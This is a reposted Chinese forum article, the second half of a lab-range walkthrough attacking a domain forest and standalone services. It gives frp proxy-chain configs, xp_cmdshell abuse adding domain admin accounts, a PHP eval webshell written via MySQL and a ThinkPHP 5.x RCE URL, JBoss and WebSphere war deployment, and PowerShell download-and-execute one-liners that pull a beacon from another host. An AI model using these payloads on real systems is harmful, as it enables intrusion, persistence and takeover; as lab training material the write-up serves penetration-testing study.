设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 【内网渗透系列】|22-实战渗透域森林+服务森林(下) ...
返回列表 发新帖
查看: 2251|回复: 0

【内网渗透系列】|22-实战渗透域森林+服务森林(下)

[复制链接]
wangqiang

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-4-8 19:18:14 | 显示全部楼层 |阅读模式
本帖最后由 wangqiang 于 2022-4-8 19:28 编辑

【内网渗透系列】|22-实战渗透域森林+服务森林(下)【内网靶场下载】

特mac0x01 Hacking黑白红

2022-04-08 08:33

原文地址:https://www.freebuf.com/articles/network/288128.html

来自FreeBuf.COM

本文目录

0x09 攻击独立域控服务器
一、建立二级frp
二、信息收集
三、MSSQL命令执行利用并上线CS
四、信息收集
0x10 攻击独立域财务服务器
一、建立三级frp
二、mysql弱口令利用并上线CS
0x11 攻击JBOSS独立机
一、信息收集
二、JMX Console未授权访问漏洞利用并上线CS
0x12 攻击ThinkPHP独立机
一、信息收集
二、ThinkPHP5.x远程代码执行漏洞利用并上线CS
0x13 攻击Shiro独立机
一、信息收集
二、shiro反序列化利用并上线CS
0x14 攻击Struts2独立机
一、信息收集
二、Struts2-045漏洞利用并上线CS
0x15 攻击WebSphere独立机
一、信息收集
二、弱口令利用并上线CS
0x16 总结

接上篇的实战渗透域森林+服务森林(上),上篇文章中只讲到了一级和二级代理、域渗透常规操作以及部分服务攻防,本篇就主要涉及到frp的三级代理和服务攻防的相关知识了。

0x09 攻击独立域控服务器
之前在子域中子域中发现存在10.12.10.0/24网段,通过nbtscan发现存在10.12.10.3这台主机

一、建立二级frp上线CS需要建立二级frp通道
(一)相关配置
子域域控frpc.ini配置如下
  1. [common]
  2. server_addr = 10.10.10.101
  3. server_port = 13000
  4. [http_proxy]
  5. type = tcp
  6. remote_port = 1097
  7. plugin = socks5
复制代码

Web服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 10.10.10.101
  3. bind_port = 13000
复制代码

Web服务器frpc.ini配置如下
  1. [common]
  2. server_addr = 1.117.58.131
  3. server_port = 13000
  4. [http_proxy]
  5. type = tcp
  6. local_ip = 10.10.10.101
  7. local_port = 1097
  8. remote_port = 1097
复制代码

公网服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 0.0.0.0
  3. bind_port = 13000
复制代码

(二)命令执行
首先先开启服务端的frp,在web服务器和公网服务器下执行如下命令
  1. frps.exe -c frps.ini
  2. ./frps -c frps.ini
复制代码



之后在子域域控中执行
  1. frpc.exe -c frpc.ini
复制代码



最后在web服务器中执行

  1. frpc.exe -c frpc.ini
复制代码




在proxychains添加代理
  1. vim /etc/proxychains.conf
复制代码




二、信息收集通过fscan对10.12.10.3进行扫描

扫描结果存在MSSQL数据库,账号密码为sa/admin@123

三、MSSQL命令执行利用并上线CS
首先使用MSF针对SQLserver的利用模块
  1. msfconsole
  2. # 设置代理
  3. msf > setg Proxies socks5:1.117.58.131:1097
  4. msf > setg ReverseAllowProxy true

  6. # 使用攻击模块
  7. msf > use admin/mssql/mssql_exec
  8. msf > set CMD whoami
  9. msf > set RHOSTS 10.12.10.3
  10. msf > set PASSWORD admin@123
  11. msf > run
复制代码



之后创建用户
  1. msf > set CMD net user mac 123QWEasd /add
  2. msf > set CMD net localgroup administrators mac /add
复制代码




但是报错,于是通过代理使用navicat连接mssql 查询xp_cmd是否开启
  1. select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
复制代码

返回1说明开启

如果没有开启可以执行以下命令进行开启
  1. EXEC sp_configure 'show advanced options', 1;
  2. RECONFIGURE;
  3. EXEC sp_configure 'xp_cmdshell',1;
  4. RECONFIGURE;
复制代码

命令执行,添加用户并添加到admins组
  1. master..xp_cmdshell 'net user mac /domain' #发现mac用户已添加
  2. master..xp_cmdshell 'net group "domain admins" mac /add /domain'
复制代码


于是在子域控中建立ipc$
  1. shell net use \\10.12.10.3\ipc$ "123QWEasd" /user:10.12.10.3\mac
  2. dir \\10.12.10.3\c$
复制代码



在子域控中设置中转监听同时生成mac4.exe


将mac4.exe上传到子域控中,通过IPC复制到10.12.10.3
  1. shell copy mac4.exe \\10.12.10.3\c$
  2. shell dir \\10.12.10.3\c$
复制代码



可以通过navicat连接数据库执行命令上线CS
  1. master..xp_cmdshell 'cd C:\ & mac4.exe'
复制代码

也可以通过wmiexec来执行命令上线
  1. proxychains python3 wmiexec.py mac:123QWEasd@10.12.10.3
复制代码


成功上线CS

四、信息收集

发现该IP上存在两张网卡,即有两个网段
  1. 10.12.10.3
  2. 20.20.20.10
复制代码


通过nbtscan扫描20.20.20.0/24网段



  1. 20.20.20.10     DULI\WIN-LOH5RS7UNDP            SHARING DC
  2. 20.20.20.101    WORKGROUP\WIN-AMJ9T9TL123       SHARING
  3. 20.20.20.102    -no name-
  4. 20.20.20.103    -no name-
  5. 20.20.20.104    -no name-
  6. 20.20.20.105    -no name-
  7. 20.20.20.199    DULI\CAIWU                      SHARING
复制代码

通过fscan扫描20.20.20.0/24网段
  1. WebTitle:http://20.20.20.103:5985 404 None
  2. WebTitle:http://20.20.20.103:47001 404 None
  3. NetInfo:
  4. [*]20.20.20.103
  5.    [->]WIN-AMJ9T9TL123
  6.    [->]20.20.20.103
  7. 20.20.20.10 MS17-010 (Windows Server 2008 HPC Edition 7601 Service Pack 1)
  8. WebTitle:http://20.20.20.105:47001 404 None
  9. WebTitle:http://20.20.20.105:5985 404 None
  10. WebTitle:http://20.20.20.105:9060 404 None
  11. WebTitle:http://20.20.20.105:9080 404 None
  12. NetInfo:
  13. [*]20.20.20.105
  14.    [->]WIN-AMJ9T9TL123
  15.    [->]20.20.20.105
  16. WebTitle:http://20.20.20.10:47001 404 None
  17. WebTitle:http://20.20.20.101:8080 200 Welcome to JBoss AS
  18. NetInfo:
  19. [*]20.20.20.104
  20.    [->]WIN-AMJ9T9TL123
  21.    [->]20.20.20.104
  22. NetInfo:
  23. [*]20.20.20.101
  24.    [->]WIN-AMJ9T9TL123
  25.    [->]20.20.20.101
  26. WebTitle:https://20.20.20.105:9443 404 None
  27. WebTitle:https://20.20.20.105:9043 404 None
  28. mssql:20.20.20.10:1433:sa admin@123
  29. WebTitle:http://20.20.20.104:5985 404 None
  30. WebTitle:http://20.20.20.104:47001 404 None
  31. WebTitle:http://20.20.20.104:8080 200 Apache Tomcat/8.5.65
  32. WebTitle:http://20.20.20.101:47001 404 None
  33. WebTitle:http://20.20.20.101:5985 404 None
  34. WebTitle:https://20.20.20.105:8880 500 None
  35. NetInfo:
  36. [*]20.20.20.199
  37.    [->]caiwu
  38.    [->]20.20.20.199
  39.    [->]2002:1414:14c7::1414:14c7
  40. NetInfo:
  41. [*]20.20.20.102
  42.    [->]WIN-AMJ9T9TL123
  43.    [->]20.20.20.102
  44. 20.20.20.199 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
  45. WebTitle:http://20.20.20.102:5985 404 None
  46. WebTitle:http://20.20.20.102:47001 404 None
  47. mysql:20.20.20.199:3306:root root
  48. WebTitle:http://20.20.20.102:80 200 None
  49. WebTitle:http://20.20.20.199:80 200 phpStudy 鎺㈤拡 2014
复制代码

通过cscan扫描20.20.20.0/24网段
  1. 20.20.20.10 MS17-010 WIN-LOH5RS7UNDP dul.com [Win 2008 HPC Edition 7601 SP 1]
  2. 20.20.20.101 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
  3. 20.20.20.102 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
  4. 20.20.20.104 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
  5. 20.20.20.103 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
  6. 20.20.20.105 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
  7. 20.20.20.199 MS17-010 CAIWU dul.com [Win 7 Professional 7601 SP 1]
复制代码


0x10 攻击独立域财务服务器
打击20.20.20.0/24网段首先需要建立三级frp

一、建立三级frp

(一)相关配置
独立域控frpc.ini配置如下
  1. [common]
  2. server_addr = 10.12.10.5
  3. server_port = 14000
  4. [http_proxy]
  5. type = tcp
  6. remote_port = 1098
  7. plugin = socks5
复制代码

子域控frps.ini配置如下
  1. [common]
  2. bind_addr = 10.12.10.5
  3. bind_port = 14000
复制代码

子域控frpc.ini配置如下
  1. [common]
  2. server_addr = 10.10.10.101
  3. server_port = 14000
  4. [http_proxy]
  5. type = tcp
  6. local_ip = 10.12.10.5
  7. local_port = 1098
  8. remote_port = 1098
复制代码


Web服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 10.10.10.101
  3. bind_port = 14000
复制代码

Web服务器frpc.ini配置如下
  1. common]
  2. server_addr = 1.117.58.131
  3. server_port = 14000
  4. [http_proxy]
  5. type = tcp
  6. local_ip = 10.10.10.101
  7. local_port = 1098
  8. remote_port = 1098
复制代码


公网服务器frps.ini配置如下
  1. [common]
  2. bind_addr = 0.0.0.0
  3. bind_port = 14000
复制代码

(二)命令执行
首先先开启服务端的frp,在web服务器、公网服务器、子域控下执行如下命令
  1. frps.exe -c frps.ini
  2. ./frps -c frps.ini
复制代码


之后在独立域控下执行如下命令
  1. frpc.exe -c frpc.ini
复制代码



之后在子域控下执行如下命令
  1. frpc.exe -c frpc.ini
复制代码



之后在web服务器下执行如下命令
  1. frpc.exe -c frpc.ini
复制代码



在proxychains添加代理
  1. vim /etc/proxychains.conf
复制代码




二、mysql弱口令利用并上线CS

通过访问http://20.20.20.199
  1. proxychains firefox http://20.20.20.199/phpmyadmin
复制代码


但是加载太慢了,它的默认口令为root/root,利用方法和之前一样

这里选择MSF爆破弱口令
  1. msfconsole
  2. msf > use auxiliary/scanner/mysql/mysql_login
  3. msf > setg Proxies socks5:1.117.58.131:1098
  4. msf > setg ReverseAllowProxy true
  5. msf > set rhosts 20.20.20.199
  6. msf > set PASSFILE xxx
  7. msf > exploit
复制代码

得到弱口令root/root,直接登录
  1. proxychains mysql -u root -proot -h20.20.20.199
复制代码


查看是否拥有写入文件的权限和写入位置,空表示可以写入任意位置
  1. show global variables like '%secure_file_priv%';
复制代码


写入木马到网站目录下
  1. select '<?php @eval($_POST[mac]);?>' into outfile 'C:/phpStudy/WWW/mac2.php';
复制代码




设置蚁剑代理,连接http://20.20.20.199/mac2.php,成功上线

设置中转监听,并生成木马mac5.exe

在蚁剑中上传mac5.exe并执行

0x11 攻击JBOSS独立机

一、信息收集通过fscan发现http://20.20.20.101:8080
  1. proxychains firefox http://20.20.20.101:8080
复制代码



为JBOSS中间件,可能存在JMX Console未授权访问漏洞

二、JMX Console未授权访问漏洞利用并上线CS

找到Jboss-system中的MainDepolyer

在20.20.20.199的http界面中上传war包

打包war包
  1. jar -cvf mac.war "mac.jsp"
复制代码


在JBOSS中远程(deploy)部署http://20.20.20.199/mac.war,点击invoke

访问网址http://20.20.20.101:8080/mac/mac.jsp,已成功部署
执行以下命令上线CS
  1. powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
复制代码




0x12 攻击ThinkPHP独立机

一、信息收集通过fscan扫描到该主机存在http服务,通过代理进行访问
  1. proxychains firefox http://20.20.20.102
复制代码




显示为ThinkPHP v5框架,可能存在远程代码执行漏洞

二、ThinkPHP5.x远程代码执行漏洞利用并上线CS

首先验证是否存在该漏洞
  1. http://20.20.20.102/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1%20and%20it%27ll%20execute%20the%20phpinfo
复制代码



跳出phpinfo界面说明存在该漏洞
通过任意代码执行写入shell 小马源码:
  1. <?php @eval($_POST[mac]);?>
复制代码


url编码后:
  1. %3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%61%63%5d%29%3b%3f%3e
复制代码


将参数进行替换
  1. http://20.20.20.102/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=mac.php&vars[1][]=%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%6d%61%63%5d%29%3b%3f%3e
复制代码





返回数值就说明执行成功
通过蚁剑连接http://20.20.20.102/mac.php,成功上线

上传mac5.exe并成功执行,上线CS

0x13 攻击Shiro独立机

一、信息收集通过fscan扫描到该主机存在http服务,通过代理进行访问
  1. proxychains firefox http://20.20.20.103:8080
复制代码




为tomcat界面,访问控制界面出错,对其下目录进行扫描,发现http://20.20.20.103:8080/shiro,为Shiro框架

二、shiro反序列化利用并上线CS
通过shiro-1.2.4-rce对其进行利用
  1. git clone https://github.com/zhzyker/shiro-1.2.4-rce.git
  2. cd shiro-1.2.4-rce
  3. proxychains python3 shiro-1.2.4_rce.py http://20.20.20.103:8080/shiro/login.jsp
复制代码



执行powershell命令上线CS
  1. powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
  2. powershell.exe (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
  3. powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
复制代码


这台一直出现问题,无法上线

0x14 攻击Struts2独立机

一、信息收集通过fscan扫描8080端口存在web服务,访问http://20.20.20.104:8080
  1. proxychains firefox http://20.20.20.104:8080
复制代码




为Tomcat界面,访问目录S2-045,判断可能存在Struts2系列框架漏洞


二、Struts2-045漏洞利用并上线CS

通过burp抓取数据包,需先设置代理

  1. <blockquote>POST /S2-045/fileupload/doUpload.action HTTP/1.1
复制代码




执行后,成功上线CS


0x15 攻击WebSphere独立机

一、信息收集
通过railgun工具扫描端口信息,发现9060和9043是WebSphere使用的端口 访问http://20.20.20.105:9043/ibm/console/logon.jsp
  1. proxychains firefox https://20.20.20.105:9043/ibm/console/logon.jsp
复制代码




二、弱口令利用并上线CS
通过弱口令admin/admin@123登录,存在WebSphere中间件漏洞


选择新增企业版应用,之后部署war包之后一直下一步,直到选填路径完成并保存,选择刚刚部署的war包开始运行

访问http://20.20.20.105:9080/mac/mac.jsp




执行命令上线CS

  1. powershell (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/mac5.exe','mac5.exe');start-process mac5.exe
复制代码




最后成功上线CS

0x16 总结

本次域渗透+服务攻防的通关让我对内网渗透的理解更加透彻,其中建立代理是打内网的关键,其他的话和平时渗透差不多。
感谢大家看完这一长篇的笔记,欢迎大家在评论区留言交流。最后附上通关图。

原文地址:https://www.freebuf.com/articles/network/288128.html
本文作者:特mac0x01, 转载请注明来自FreeBuf.COM

推荐阅读
【内网渗透系列】|19-内网渗透之域环境渗透测试过程
【内网渗透系列】|18-一次模拟从外网到内网漫游的实验过程
【内网渗透系列】|17-从公网渗透到内网、拿域控(附:靶场下载)
【内网渗透系列】|16-三层网络渗透测试实验(文末附 内网渗透靶场 下载方式)
【内网渗透系列】|15-内网渗透、横向攻击思路(文末赠内网渗透书籍)
【内网渗透系列】|14-内网穿透之多层代理
【内网渗透系列】|13-哈希传递攻击利用(Pass The Hash)
ATT&CK实战系列-红队评估 (一)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (二)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (三)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (四)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (五)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (六)Vulnstack靶场内网域渗透
ATT&CK实战系列-红队评估 (七)Vulnstack三层网络域渗透靶场
【内网渗透系列】1-暗月出师三层网络靶机7 writeup(附带【其他内网靶场】链接地址)
域渗透之(白银票据利用)
域渗透之黄金票据的利用
【内网渗透系列】- 获取windows hash的几种方式(文中附工具下载链接)
内网穿透 | 一文让你熟练运用内网穿透(步骤详细)




回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 14:30 , Processed in 0.031098 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表